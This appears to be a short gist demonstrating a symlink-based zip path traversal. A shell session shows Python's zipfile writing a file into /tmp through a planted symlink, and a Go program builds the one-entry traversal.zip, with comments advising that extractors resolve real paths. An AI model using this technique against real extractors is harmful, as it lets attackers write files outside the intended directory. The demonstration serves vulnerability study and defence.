~/current/zip_vulns ❯ ls -al /tmp/zip_attack123
ls: cannot access '/tmp/zip_attack123': No such file or directory
~/current/zip_vulns ❯ ln -s /tmp tmp_dir
~/current/zip_vulns ❯ python -m zipfile -l traversal.zip
File Name Modified Size
tmp_dir/zip_attack123 1980-00-00 00:00:00 11
~/current/zip_vulns ❯ python -m zipfile -e traversal.zip .
~/current/zip_vulns ❯ ls -al /tmp/zip_attack123
-rw-r--r-- 1 anon wheel 11 Jan 28 01:23 /tmp/zip_attack123
Created
January 28, 2017 00:24
package main | |
import ( | |
"archive/zip" | |
"os" | |
"log" | |
) | |
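// main writes traversal.zip, a one-entry test archive for checking how an
// extractor handles a destination path that passes through a symlink.
//
// The entry name "tmp_dir/zip_attack123" is relative and contains no ".."
// component, so a filter that only inspects the entry name accepts it. If the
// extraction directory already holds a tmp_dir symlink, an extractor that
// follows it writes the file outside the extraction root. Extractors should
// resolve the real path of each destination, symlinks included, and reject any
// entry that resolves outside the root.
func main() {
	out, err := os.Create("traversal.zip")
	if err != nil {
		log.Fatal(err)
	}

	w := zip.NewWriter(out)
	files := []struct {
		Name, Body string
	}{
		{"tmp_dir/zip_attack123", "lorem ipsum"},
	}
	for _, file := range files {
		// entry is the writer for this archive member; it is named so that it
		// does not shadow the output file handle.
		entry, err := w.Create(file.Name)
		if err != nil {
			log.Fatal(err)
		}
		if _, err := entry.Write([]byte(file.Body)); err != nil {
			log.Fatal(err)
		}
	}

	// zip.Writer.Close writes the central directory. If its error is ignored,
	// a failed write leaves an archive that looks complete but cannot be read.
	if err := w.Close(); err != nil {
		log.Fatal(err)
	}
	// Close on a written file can report a deferred write error, so check it.
	if err := out.Close(); err != nil {
		log.Fatal(err)
	}
}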